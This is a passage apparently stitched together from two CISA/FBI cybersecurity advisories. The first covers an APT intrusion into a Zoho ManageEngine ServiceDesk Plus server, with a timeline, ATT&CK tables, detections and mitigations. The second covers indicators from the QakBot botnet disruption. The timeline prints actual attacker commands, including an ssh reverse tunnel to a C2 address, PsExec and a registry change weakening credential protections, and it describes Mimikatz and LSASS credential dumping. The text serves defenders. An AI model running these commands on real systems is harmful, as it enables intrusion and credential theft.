APT actors downloaded the file ssh2.zip via the Azure user account, which contained legitimate files that could have been leveraged for malicious purposes. When unzipped, the following files were extracted:

  • install-sshd.ps1 (script)
  • psexec.exe
  • sshd.exe
  • ssh.exe
  • ssh-sk-helper.exe
  • libcrypto.dll

Note: CISA analyzed these files and did not identify the files as malicious. However, ssh.exe was downloaded to establish persistence on the ServiceDesk system via SSH [T1133] and is detailed in the scheduled task below.

2023-01-21

14:02:45

Ngrok token created, renamed to ngrok.yml config file, and Remote Desktop Protocol (RDP) connection established.

Ngrok was used to establish an RDP connection [T1021.001]—another method of maintaining persistence on the ServiceDesk system. In this instance, Ngrok was used to establish a reverse proxy connection to the ServiceDesk system.

At the time of analysis, the firewall access control lists (ACLs) allowed all outbound connections. Considering APT actors utilized an outbound proxy, the RDP session was successfully established as the connection was initiated from the ServiceDesk system.

Note: RDP is a common feature in operating systems, which allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.

2023-01-21

14:31:01

SSH tools downloaded to establish reverse (remote) communication.

Three identified executables, which provide a command line interface with the compromised system, were observed in the following file system locations:

  • c:\windows\system32\ssh-shellhost.exe
  • c:\windows\system32\ssh-agent.exe
  • c:\windows\system32\ssh-add.exe

While the files were not identified as malicious, they were loaded for malicious purposes.

2023-01-21

14:33:11

license validf scheduled task created to communicate with malicious IP 104.238.234[.]145.

license validf scheduled task [T1036.004] was created to execute ssh.exe on a recurring basis on the ServiceDesk system [T1053.005]:

c:\Windows\System32\ssh.exe -N -f -R 12100 [email protected] -p 443 -o StrictHostKeyChecking=no

Analysis identified ssh.exe was used to establish a SSH reverse tunnel to the APT actors’ C2 with dynamic port forwarding [T1572]. This allowed the actors to send traffic from their C2 server into the environment and connect directly to other systems and resources.

2023-01-21

14:51:49

PsExec executed on the ServiceDesk system.

Analysis identified evidence and execution of two files (PsExec.exe and psexec.exe) on the ServiceDesk system. These files were determined to be benign.

APT actors utilized PsExec to create a scheduled task and force-store administrative credentials to the local machine.

psexec.exe -i -s C:\Windows\System32\mmc.exe /s C:\Windows\System32\taskschd.msc

powershell New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force

Note: PsExec, a command line utility from Microsoft’s Sysinternals Suite, is known to be used for lateral movement; evidence of lateral movement via PsExec has not been confirmed.

2023-01-21

14:55:02

ProcDump created on the ServiceDesk system.

ProcDump was created within the c:\windows\system32\prc64.exe directory. This was later identified as a method for enumerating running processes/applications [T1057] and dumping LSASS credentials.

2023-01-24

15:07:18

Apache Log4j exploit attempted against the ServiceDesk system.

APT actors attempted to exploit a known Apache Log4j vulnerability (CVE-2021-44228) in the ServiceDesk system but were unsuccessful. The two IPs and one domain associated with this exploitation attempt are:

  • 80.85.241[.]15
  • 68.177.56[.]38
  • main.cloudfronts[.]net

2023-01-25

00:17:33

Mimikatz credential dump files created.

One file (c:\ManageEngine\ServiceDesk\bin\1.txt) was created as a method for Mimikatz to dump/write credentials to disk on the ServiceDesk system.

Note: This is a different path and time associated with Mimikatz than listed above.

2023-01-29

HTTP-GET requests sent to C2 IP 92.118.39[.]82.

The server hosting ServiceDesk was observed beaconing/sending HTTP-GET requests to a suspected APT-controlled C2 server, indicating malware was successfully implanted.

2023-02-02

05:51:08

Resource.aspx web shell detected.

Using additionally compromised, legitimate administrative credentials, APT actors logged into the Outlook Web Application (OWA) server from the ServiceDesk system. The actors dropped an Active Server Pages Extended (ASPX) web shell in the following file system location, which was designed to execute remote JavaScript code [T1059.007] on the OWA server [T1505.003]:

  • c:\Program Files\Microsoft Office Web Apps\RootWebSite\en-us\resource.aspx

Note: The administrative user’s credentials were obtained from the APT actors’ collection (LSASS dump) of credentials from the entire AD domain. This user is separate from the actor-created Azure user account.

See MAR-10430311-1.v1 for additional details.

2023-02-02

18:45:58

Metasploit service installed.

APT actors installed Metasploit with the following attributes on the organization’s domain controller [T1059.001]:

  • Service Name: QrrCvbrvnxasKTSb [T1543.003]
  • Service File Name: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4) [T1564.003]

Note: Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform several actions, including discovery of information and execution of code.

2023-02-03

03:27:59

ConfigLogin.aspx web shell detected.

APT actors dropped an additional ASPX web shell on a web server in the following file system location:

  • c:\inetpub\wwwrot\uninet\css\font-awesome\css\ConfigLogin.aspx

See MAR-10430311-1.v1 for additional details.

2023-02-03

15:12:23

wkHPd.exe created to communicate with malicious IP 108.62.118[.]160.

APT actors created and used a variant of Metasploit (Meterpreter) on the ServiceDesk system, listed as wkHPd.exe [T1587.001]. This variant serves as an attack payload that runs an interactive shell and allows a malicious actor to control and execute code on a system.

See MAR-10430311-1.v1 for additional details.

2023-02-08

08:56:35,

2023-02-09

20:19:59,

2023-03-04,

2023-03-18

Hypertext Preprocessor (PHP) files uploaded via HTTP-POST request from malicious IP 193.142.146[.]226.

PHP files were uploaded to the ServiceDesk system via HTTP-POST request. APT actors were observed writing 16 instances of the following files to disk:

  • [REDACTED]/wp-content/themes/seotheme/db.php (12 instances)
  • [REDACTED]/wp-content/plugins/ioptimization/IOptimize.php (4 instances)

2023-03-06

06:49:40

Interact.sh

APT actors executed Domain Name System (DNS) scanning at an additional server (not the ServiceDesk system) and directed callback to the Interact.sh domain, which indicated the server was susceptible to a DNS-style attack [T1046].

Destination IP: 103.105.49[.]108

Post-engagement analysis was extended but analysts were unable to determine additional actions taken by the APT actors, likely due to a lack of sensor coverage and data unavailability. With the data available, it was determined APT actors used the tools listed in Table 2 during their operations.

Table 2: Observed Tools Used by APT Actors

Tool

Description

Observation

Mimikatz [2]

A credential dumping tool capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks.

In addition to using Mimikatz for credential dumping, APT actors dumped the following Windows Registry Hive files:

These files were dumped to obtain registry information such as users on the system, data used by the operating system [T1012], and installed programs.

Ngrok [3]

Ngrok software operates by running a client process on the machine and creating a private connection tunnel to a designated open port. Ngrok delivers instant ingress to applications in any cloud, private network, or devices with authentication, load balancing, and other critical controls.

In recent years, Ngrok has been leveraged maliciously by a variety of threat actors, including use for persistence, lateral movement, and data exfiltration.[4],[5],[6]

Using Ngrok as an external service, APT actors were able to gain access to and utilize the command line on victim systems.

Note: CISA and co-sealers have observed this commonly used commercial platform being abused by malicious actors to bypass typical firewall controls. Ngrok’s ability to tunnel RDP and other services securely over internet connections makes it a target for abuse by malicious actors.

ProcDump

A command-line application used to monitor processes and create crash dump files. A crash dump file contains the data loaded in memory at the time the dump was triggered. It is typically used for troubleshooting errors with an application or operating system.

APT actors used ProcDump to conduct reconnaissance and examine spawned processes (applications in use). This tool was also utilized as a utility for dumping credentials from the server hosting ServiceDesk Plus.

Metasploit

Metasploit is an open-source penetration testing software.

 

APT actors’ specific use of Meterpreter—an attack payload of Metasploit—serves as an interactive shell and allows threat actors to control and execute code on a system.

Interact.sh

An open-source tool for detecting external interactions (communication).[7] This tool is used to detect callbacks from target systems for specified vulnerabilities and commonly used during the reconnaissance stages of adversary activity.

APT actors likely used Interact.sh to refrain from using and disclosing their own C2 infrastructure.

anydesk.exe

A remote desktop application that provides platform-independent remote access to personal computers and other devices running the host application. It offers remote control, file transfer, and VPN functionality.

 

Between early-February and mid-March 2023, anydesk.exe was observed on three hosts with different certificate issuers and hashes—none of which were the certified issuer [T1553.002]. APT actors compromised one host and moved laterally to install the executable on the remaining two [T1570]—listed in order of time, as follows:

  • c:\programdata\anydesk.exe
  • c:\Users\[REDACTED]\Downloads\AnyDesk.exe
  • c:\Users\[REDACTED]\Documents\personal\program\AnyDesk.exe

Note: Analysts confirmed APT actors’ weaponized use of anydesk.exe but were unable to confirm how the software was installed on each host.

quser.exe

A valid program on Windows machines that displays information about user sessions on a Remote Desktop Session Host server [T1049], including the name of the user, name of the session on the remote desktop session host server, session ID, state of the session (active or disconnected), idle time (number of minutes since last keystroke or mouse movement), and date/time the user logged on.[8]

APT actors were observed using this tool as early as March 2023 across four locations with the same name but different hashes (one of which is associated with the Portuguese [Brazil] language pack):

c:\ProgramFiles\WindowsApps\Microsoft.LanguageExperiencePackpt-BR_19041.56.186.0_neutral__8wekyb3d8bbwe\Windows\System32\pt-BR

xpack.exe

A custom .NET loader that decrypts (AES), loads, and executes accompanying files.

Xpack.exe indicators were present on multiple organization hosts, with an unverified user account observed navigating to the sites: xpack.github[.]io and xpack.disqus[.]com. Additionally, one administrator account and multiple user accounts were observed executing the xpack.exe file from a hidden directory [T1564.001]:

c:\USERS\[REDACTED]\.P2\POOL\PLUGINS\ORG.ECLIPSE.EMBEDCDT.TEMPLATES.XPACK_6.3.1.202210101738

This malware was predominantly used to execute system commands, drop additional malware and tools, and stage data for exfiltration [T1074]. Note: The data exfiltrated is unknown.

 

MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 3-13 for all referenced APT actors’ tactics and techniques for enterprise environments in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Table 3: Resource Development

Technique Title

ID

Use

Acquire Infrastructure: Botnet

T1583.005

Actors used User-Agent string Hello World as an initial step of the Mirai botnet to later download malicious artifacts.

Develop Capabilities: Malware

T1587.001

Actors created and used a variant of Metasploit (Meterpreter) on the ServiceDesk system, listed as wkHPd.exe. This malware serves as an attack payload that runs an interactive shell; it allows for control and code execution on a system.

Obtain Capabilities: Exploits

T1588.002

Actors leveraged the legitimate ConnectWise ScreenConnect client to download and utilize the credential dumping tool, mimikatz.exe.

 

Table 4: Initial Access

Technique Title

ID

Use

Exploit Public-Facing Application

T1190

Actors exploited a known vulnerability (CVE-2022-47966) in the organization’s web server hosting Zoho ManageEngine ServiceDesk Plus.

Actors also attempted to exploit a known Apache Log4j vulnerability (CVE-2021-44228) in the ServiceDesk system but were unsuccessful.

 

Table 5: Execution

Technique Title

ID

Use

Command and Scripting Interpreter: PowerShell

T1059.001

Actors installed and used Metasploit via PowerShell on the organization’s domain controller.

Command and Scripting Interpreter: JavaScript

T1059.007

Actors dropped an ASPX web shell on the OWA server, which was designed to execute remote JavaScript code.

 

Table 6: Persistence

Technique Title

ID

Use

Scheduled Task/Job: Scheduled Task

T1053.005

Actors created the scheduled task license validf to execute ssh.exe on a recurring basis. This executable was observed as means of establishing persistence on the ServiceDesk system.

Valid Accounts: Local Accounts

T1078.003

Actors compromised and utilized account credentials from a previously hired contractor, of which the contract ended prior to the timeframe of observed activity.

External Remote Services

T1133

ssh.exe executes on a recurring basis via a scheduled task on the ServiceDesk system as a method for access via SSH.

Create Account: Local Account

T1136.001

Actors created a local account with administrative permissions on the server hosting ServiceDesk Plus.

Server Software Component: Web Shell

T1505.003

Actors logged into the OWA server from the ServiceDesk system and dropped an ASPX web shell to establish persistent access and execute remote code.

Create or Modify System Process: Windows Service

T1543.003

Actors created a Windows Service via Metasploit.

 

Table 7: Privilege Escalation

Technique Title

ID

Use

Exploitation for Privilege Escalation

T1068

Through exploitation of CVE-2022-47966, actors were given root level access on the web server and created a local user account named Azure with administrative privileges.

 

Table 8: Defense Evasion

Technique Title

ID

Use

Indicator Removal: Clear Windows Event Logs

T1070.001

Actors compromised and used disabled, legitimate administrative account credentials to delete logs from several critical servers in the environment.

Masquerading: Masquerade Task or Service

T1036.004

Actors created a scheduled task license validf, which appears as legitimate/benign and executes ssh.exe on a recurring basis on the ServiceDesk system.

Masquerading: Masquerade File Type

T1036.008

Actors attempted to export three files, which were analyzed and identified as LSASS dump files. These files were renamed with .zip and .gif extensions to evade detection.

Obfuscated Files or Information: Embedded Payloads

T1027.009

Actors downloaded the malware bitmap.exe on the ServiceDesk system to execute an obfuscated, embedded malicious payload from its C2 server.

Subvert Trust Controls: Code Signing

T1553.002

Anydesk.exe was observed on three hosts with different certificate issuers and hashes—none of which were the certified issuer.

Hide Artifacts: Hidden Files and Directories

T1564.001

Actors used xpack.exe as a method for decrypting, loading, and executing accompanying files from a hidden directory.

Hide Artifacts: Hidden Window

T1564.003

Actors used -w hidden to conceal PowerShell windows by setting the WindowStyle parameter to hidden.

 

Table 9: Credential Access

Technique Title

ID

Use

OS Credential Dumping

T1003

Actors created three files as means for Mimikatz to dump/write credentials to disk on the ServiceDesk system.

OS Credential Dumping: LSASS Memory

T1003.001

Actors successfully accessed and dumped credentials stored in the process memory of LSASS for the AD domain, including with the use of ProcDump.

OS Credential Dumping: Security Account Manager

T1003.002

Actors dumped sam.hiv to obtain information about users on the system.

 

Table 10: Discovery

Technique Title

ID

Use

System Network Connections Discovery

T1049

Quser.exe was executed to acquire information about user sessions on a Remote Desktop Session Host server.

Query Registry

T1012

Actors dumped system.hiv and security.hiv to obtain information about the data used by the operating system.

Remote System Discovery

T1018

Actors downloaded the legitimate file/application nmap.exe via the Azure user to conduct network information gathering efforts.

Network Sniffing

T1040

Actors downloaded the legitimate file/application npcap.exe via the Azure user to conduct credential gathering efforts.

Network Service Discovery

T1046

Actors executed DNS scanning at a web server and directed callback to the Interact.sh domain, which indicated the server was susceptible to a DNS-style attack.

Process Discovery

T1057

ProcDump was created within the c:\windows\system32\prc64.exe directory as a method for enumerating running processes/applications.

 

Table 11: Lateral Movement

Technique Title

ID

Use

Remote Services: Remote Desktop Protocol

T1021.001

Ngrok was used to establish an RDP connection with the ServiceDesk system.

Lateral Tool Transfer

T1570

Actors compromised one host and moved laterally to install anydesk.exe on two additional hosts.

 

Table 12: Collection

Technique Title

ID

Use

Data Staged

T1074

Actors executed xpack.exe malware from a hidden directory. This malware was predominantly used to execute system commands, drop additional malware and tools, and stage data for exfiltration.

 

Table 13: Command and Control

Technique Title

ID

Use

Application Layer Protocol: Web Protocols

T1071.001

Hello World User-Agent string was identified in a HTTP request. Communication occurred between the organization’s web server and an actor-controlled C2 IP address.

Remote Access Software

T1219

Actors leveraged ConnectWise ScreenConnect to connect to the ServiceDesk system.

Anydesk.exe was run on at least three different hosts in the environment.

Non-Standard Port

T1571

Actors initiated multiple TLS-encrypted sessions on non-standard TCP port 10443.

Protocol Tunneling

T1572

Actors were observed leveraging SSH to build a reverse tunnel with their C2 server to dynamically forward traffic into the victim organization’s environment.

Using Ngrok as an external service, actors were also able to gain access to and use the command line on victim systems via RDP.

Encrypted Channel: Asymmetric Cryptography

T1573.002

Actors initiated multiple TLS-encrypted sessions on TCP port 10443, indicating successful exchanges of data transfer from the firewall device.

 

DETECTION METHODS

CISA and co-sealers recommend reviewing Tables 3-13: Identified ATT&CK Techniques for Enterprise in conjunction with the detections in this section to identify similar activity.

  • Enable logging for new user creation [DS0002], as well as monitor executed commands and arguments for actions that are associated with local account creation, such as net user /add, useradd, and dscl -create [DS0017].
  • Monitor for newly constructed scheduled tasks by enabling the “Microsoft-Windows-TaskScheduler/Operational” setting within the event logging service. Monitor for changes made to scheduled tasks that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools [DS0003].
  • Monitor for API calls that may create or modify Windows services (ex: CreateServiceW()) to repeatedly execute malicious payloads as part of persistence [DS0009].
  • Monitor executed commands and arguments that may attempt to access credential material stored in the process memory of the LSASS [DS0017].
  • Monitor for user accounts logged into systems associated with RDP (ex: Windows EID 4624 Logon Type 10) [DS0028].
  • Monitor for newly-constructed network connections associated with pings/scans that may attempt to collect a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for lateral movement from the current system [DS0029].
  • Conduct full port scans (1-65535) on internet-facing systems—not just a subset of the ports.

MITIGATIONS

Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

Manage Vulnerabilities and Configurations [CPG 1.E, CPG 3.A]

CISA and co-sealers identified that exploitation of CVE-2022-47966 granted initial access to the public-facing application, Zoho ManageEngine ServiceDesk Plus. Multiple Zoho ManageEngine on-premises products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of version 1.4.1 of Apache XML Security for Java (also known as xmlsec) from the Apache Santuario project. Due to the xmlsec XSLT features by design in that version, the application is responsible for certain security protections. CISA and co-sealers recommend the following:

  • Document device configurations [CPG 2.O]. Organizations should maintain updated documentation describing the current configuration details of all critical IT assets (and OT, where applicable), as this facilitates more effective vulnerability and response activities.
  • Keep all software up to date and patch systems for known exploited vulnerabilities. In places with known exploited vulnerabilities on an endpoint device (e.g., firewall security appliances), conduct investigation prior to patching [CPG 1.E].
  • Follow a routine patching cycle [M1051] for all operating systems, applications, and software (including all third-party software) to mitigate the potential for exploitation.
  • Prioritize remediation of vulnerabilities on internet-facing systems, for example, by conducting continuous automated and/or routine vulnerability scans [M1016]. CISA offers a range of services at no cost, including scanning and testing to help organizations reduce exposure to threats via mitigating attack vectors. Specifically, Cyber Hygiene services can help provide a second-set of eyes on organizations’ internet-accessible assets. Organizations can email [email protected] with the subject line, “Requesting Cyber Hygiene Services” to get started. For additional guidance on remediating these vulnerabilities, see CISA Insights – Remediate Vulnerabilities for Internet-Accessible Systems.
  • Deploy security.txt files [CPG 4.C]. All public-facing web domains have a security.txt file that conforms to the recommendations in RFC 9116.[9]

Segment Networks [CPG 2.F]

CISA and co-sealers identified that the organization did not employ proper network segmentation, such as a demilitarized zone (DMZ), during the initial discovery phase of the incident response. A DMZ serves as a perimeter network that protects and adds an extra layer of security to an organization’s internal local area network (LAN) from untrusted traffic.

  • Employ proper network segmentation, such as a DMZ, and ensure to address the following recommendations. Note: The end goal of a DMZ network is to allow an organization to access untrusted networks, such as the internet, while ensuring its private network or LAN remains secure. Organizations typically store external-facing services and resources, as well as servers for DNS, File Transfer Protocol (FTP), mail, proxy, Voice over Internet Protocol (VoIP), and web servers in the DMZ [CPG 2.K, CPG 2.W].
    • Limit internet-facing port exposure for critical resources in the DMZ networks.
    • Limit exposed ports to only required IP addresses and avoid placing wildcards in destination port or host entries.
    • Ensure unsecured protocols like FTP and HTTP are limited in use and restricted to specific IP ranges.
    • If data flows from untrusted zone to trusted zone, ensure it is conducted over a secure protocol like HTTPS with mandatory multi-factor authentication.
  • Use a firewall or web-application firewall (WAF) and enable logging to prevent/detect potential exploitation attempts [M1050]. Review ingress and egress firewall rules and block all unapproved protocols. Limit risky (but approved) protocols through rules.
    • Use WAF to limit exposure to just approved ports, as well as monitor file changes in web directories.
  • Implement network segmentation to separate network segments based on role and functionality. Proper network segmentation significantly reduces the ability for threat actor lateral movement by controlling traffic flows between—and access to—various subnetworks. See CISA’s Layering Network Security Through Segmentation infographic and the National Security Agency’s (NSA’s) Segment Networks and Deploy Application-Aware Defenses.

Manage Accounts, Permissions, and Workstations

APT actors were able to leverage disabled administrative accounts, as well as clear logs on several critical servers, which prevented the ability to detect follow-on exploitation or data exfiltration. CISA and co-sealers recommend the following:

  • Use phishing-resistant multi-factor authentication (MFA) [CPG 2.H] (e.g., security tokens) for remote access and access to any sensitive data repositories. Implement phishing-resistant MFA for as many services possible—particularly for webmail and VPNs—for accounts that access critical systems and privileged accounts that manage backups. MFA should also be used for remote logins [M1032]. For additional guidance on secure MFA configurations, visit cisa.gov/MFA and CISA’s Implementing Phishing-Resistant MFA Factsheet.
  • Employ strong password management alongside other attribute-based information, such as device information, time of access, user history, and geolocation data. Set a password policy to require complex passwords for all users (minimum of 16 characters) and enforce this new requirement as users’ passwords expire [CPG 2.A, CPG 2.B, CPG 2.C].
  • Implement the principle of least privilege to decrease threat actors’ abilities to access key network resources.
  • Limit the ability of a local administrator account to log in from a local interactive session [CPG 2.E] (e.g., “Deny access to this computer from the network”) and prevent access via an RDP session.
  • Establish policy and procedure for the prompt removal of unnecessary (disabled) accounts and groups from the enterprise that are no longer needed, especially privileged accounts. Implement and enforce use of Local Administrator Password Solution (LAPS).
  • Control and limit local administration, ensuring administrative users do not have access to other systems outside of the local machine and across the domain.
  • Create a change control process for all privilege escalations and role changes on user accounts. Enable alerts on privilege escalations and role changes, as well as log privileged user changes in the network environment and create alerts for abnormal events.
  • Create and deploy a secure system baseline image to all workstations. See Microsoft’s guidance on Using Security Baselines in Your Organization.
  • Implement policies to block workstation-to-workstation RDP connections [CPG 2.V] through a Group Policy Object on Windows, or by a similar mechanism. The RDP service should be disabled if it is unnecessary [M1042].

Secure Remote Access Software

Remote access software provides a proactive and flexible approach for organizations to internally oversee networks, computers, and other devices; however, cyber threat actors increasingly co-opt these tools for access to victim systems. APT actors were observed using legitimate remote access tools—ConnectWise ScreenConnect and AnyDesk—to connect to victim hosts within the organization’s environment and further conduct malicious operations. CISA and co-sealers recommend the following:

  • Establish a software behavior baseline to detect anomalies in behavior [CPG 2.T, CPG 2.U].
  • Monitor for unauthorized use of remote access software using endpoint detection tools.

For more information, see CISA’s joint Guide to Securing Remote Access Software on best practices for using remote capabilities and how to detect and defend against malicious actors abusing this software.

Other Best Practice Mitigation Recommendations

  • Use application allowlists on domain controllers, administrative hosts, and other sensitive systems. Following exploitation of the public-facing application (Zoho ManageEngine ServiceDesk Plus), APT actors were able to download and execute multiple files on the system, which were then utilized to enumerate the network and perform reconnaissance operations.
    • Use directory allowlisting rather than attempting to list every possible permutation of applications in a network environment. Safe defaults allow applications to run from PROGRAMFILES, PROGRAMFILES(X86), and SYSTEM32. Disallow all other locations unless an exception is granted and documented. Application directory allowlisting can be enabled through Microsoft Software Restriction Policy or AppLocker and can prevent the execution of unauthorized software.
  • Audit scheduled tasks and validate all findings via a Group Policy Object (GPO) or endpoint detection and response (EDR) solution.
  • Follow Microsoft’s Best Practices for Securing Active Directory.
  • Review NSA’s Network Infrastructure Security Guide.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA and co-sealers recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and co-sealers also recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Tables 3-13).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA and co-sealers recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. CISA, the FBI, and CNMF do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA, the FBI, or CNMF.

REFERENCES

  1. Snort: Known Malicious User-Agent String – Mirai
  2. MITRE: Mimikatz
  3. MITRE: Ngrok
  4. AA22-320A: Iranian Government-Sponsored APT Actors Compromise Federal Network, Deploy Crypto Miner, Credential Harvester
  5. AA22-294A: #StopRansomware: Daixin Team
  6. AA23-075A: #StopRansomware: LockBit 3.0
  7. GitHub: Interactsh
  8. Microsoft: Quser
  9. Internet Engineering Task Force (IETF): RFC 9116

VERSION HISTORY

September 7, 2023: Initial version.

Source…

Identification and Disruption of QakBot Infrastructure


SUMMARY

The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory (CSA) to disseminate QakBot infrastructure indicators of compromise (IOCs) identified through FBI investigations as of August 2023. On August 25, FBI and international partners executed a coordinated operation to disrupt QakBot infrastructure worldwide. Disruption operations targeting QakBot infrastructure resulted in the botnet takeover, which severed the connection between victim computers and QakBot command and control (C2) servers. The FBI is working closely with industry partners to share information about the malware to maximize detection, remediation, and prevention measures for network defenders.

CISA and FBI encourage organizations to implement the recommendations in the Mitigations section to reduce the likelihood of QakBot-related activity and promote identification of QakBot-facilitated ransomware and malware infections. Note: The disruption of QakBot infrastructure does not mitigate other previously installed malware or ransomware on victim computers. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to a local FBI Field Office or CISA at cisa.gov/report.

Download the PDF version of this report:

For a downloadable copy of IOCs, see:

TECHNICAL DETAILS

Overview

QakBot—also known as Qbot, Quackbot, Pinkslipbot, and TA570—is responsible for thousands of malware infections globally. QakBot has been the precursor to a significant amount of computer intrusions, to include ransomware and the compromise of user accounts within the Financial Sector. In existence since at least 2008, QakBot feeds into the global cybercriminal supply chain and has deep-rooted connections to the criminal ecosystem. QakBot was originally used as a banking trojan to steal banking credentials for account compromise; in most cases, it was delivered via phishing campaigns containing malicious attachments or links to download the malware, which would reside in memory once on the victim network.

Since its initial inception as a banking trojan, QakBot has evolved into a multi-purpose botnet and malware variant that provides threat actors with a wide range of capabilities, to include performing reconnaissance, engaging in lateral movement, gathering and exfiltrating data, and delivering other malicious payloads, including ransomware, on affected devices. QakBot has maintained persistence in the digital environment because of its modular nature. Access to QakBot-affected (victim) devices via compromised credentials are often sold to further the goals of the threat actor who delivered QakBot.

QakBot and affiliated variants have targeted the United States and other global infrastructures, including the Financial Services, Emergency Services, and Commercial Facilities Sectors, and the Election Infrastructure Subsector. FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood of QakBot-related infections and promote identification of QakBot-induced ransomware and malware infections. Disruption of the QakBot botnet does not mitigate other previously installed malware or ransomware on victim computers. If a potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to CISA and FBI.

QakBot Infrastructure

QakBot’s modular structure allows for various malicious features, including process and web injection, victim network enumeration and credential stealing, and the delivery of follow-on payloads such as Cobalt Strike[1], Brute Ratel, and other malware. QakBot infections are particularly known to precede the deployment of human-operated ransomware, including Conti[2], ProLock[3], Egregor[4], REvil[5], MegaCortex[6], Black Basta[7], Royal[8], and PwndLocker.

Historically, QakBot’s C2 infrastructure relied heavily on using hosting providers for its own infrastructure and malicious activity. These providers lease servers to malicious threat actors, ignore abuse complaints, and do not cooperate with law enforcement. At any given time, thousands of victim computers running Microsoft Windows were infected with QakBot—the botnet was controlled through three tiers of C2 servers.

Figure 1: QakBot’s Tiered C2 Servers

The first tier of C2 servers includes a subset of thousands of bots selected by QakBot administrators, which are promoted to Tier 1 “supernodes” by downloading an additional software module. These supernodes communicate with the victim computers to relay commands and communications between the upstream C2 servers and the infected computers. As of mid-June 2023, 853 supernodes have been identified in 63 countries, which were active that same month. Supernodes have been observed frequently changing, which assists QakBot in evading detection by network defenders. Each bot has been observed communicating with a set of Tier 1 supernodes to relay communications to the Tier 2 C2 servers, serving as proxies to conceal the main C2 server. The Tier 3 server controls all of the bots.

Indicators of Compromise

FBI has observed the following threat actor tactics, techniques, and procedures (TTPs) in association with OakBot infections:

  1. QakBot sets up persistence via the Registry Run Key as needed. It will delete this key when running and set it back up before computer restart: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\<random_string>
  2. QakBot will also write its binary back to disk to maintain persistence in the following folder: C:\Users\<user>\AppData\Roaming\Microsoft\<random_string>\
  3. QakBot will write an encrypted registry configuration detailing information about the bot to the following registry key: HKEY_CURRENT_USER\Software\Microsoft\<random_string>

In addition, the below IP addresses were assessed to have obtained access to victim computers. Organizations are encouraged to review any connections with these IP addresses, which could potentially indicate a QakBot and/or follow-on malware infection.

Disclaimer: The below IP addresses are assessed to be inactive as of August 29, 2023. Several of these observed IP addresses were first observed as early as 2020, although most date from 2022 or 2023, and have been historically linked to QakBot. FBI and CISA recommend these IP addresses be investigated or vetted by organizations prior to taking action, such as blocking.

Table 1: IPs Affiliated with QakBot Infections

IP Address

First Seen

85.14.243[.]111

April 2020

51.38.62[.]181

April 2021

51.38.62[.]182

December 2021

185.4.67[.]6

April 2022

62.141.42[.]36

April 2022

87.117.247[.]41

May 2022

89.163.212[.]111

May 2022

193.29.187[.]57

May 2022

193.201.9[.]93

June 2022

94.198.50[.]147

August 2022

94.198.50[.]210

August 2022

188.127.243[.]130

September 2022

188.127.243[.]133

September 2022

94.198.51[.]202

October 2022

188.127.242[.]119

November 2022

188.127.242[.]178

November 2022

87.117.247[.]41

December 2022

190.2.143[.]38

December 2022

51.161.202[.]232

January 2023

51.195.49[.]228

January 2023

188.127.243[.]148

January 2023

23.236.181[.]102

Unknown

45.84.224[.]23

Unknown

46.151.30[.]109

Unknown

94.103.85[.]86

Unknown

94.198.53[.]17

Unknown

95.211.95[.]14

Unknown

95.211.172[.]6

Unknown

95.211.172[.]7

Unknown

95.211.172[.]86

Unknown

95.211.172[.]108

Unknown

95.211.172[.]109

Unknown

95.211.198[.]177

Unknown

95.211.250[.]97

Unknown

95.211.250[.]98

Unknown

95.211.250[.]117

Unknown

185.81.114[.]188

Unknown

188.127.243[.]145

Unknown

188.127.243[.]147

Unknown

188.127.243[.]193

Unknown

188.241.58[.]140

Unknown

193.29.187[.]41

Unknown

Organizations are also encouraged to review the Qbot/QakBot Malware presentation from the U.S. Department of Health & Human Services Cybersecurity Program for additional information.

MITRE ATT&CK TECHNIQUES

For detailed associated software descriptions, tactics used, and groups that have been observed using this software, see MITRE ATT&CK’s page on QakBot.[9]

MITIGATIONS

Note: For situational awareness, the following SHA-256 hash is associated with FBI’s QakBot uninstaller: 7cdee5a583eacf24b1f142413aabb4e556ccf4ef3a4764ad084c1526cc90e117

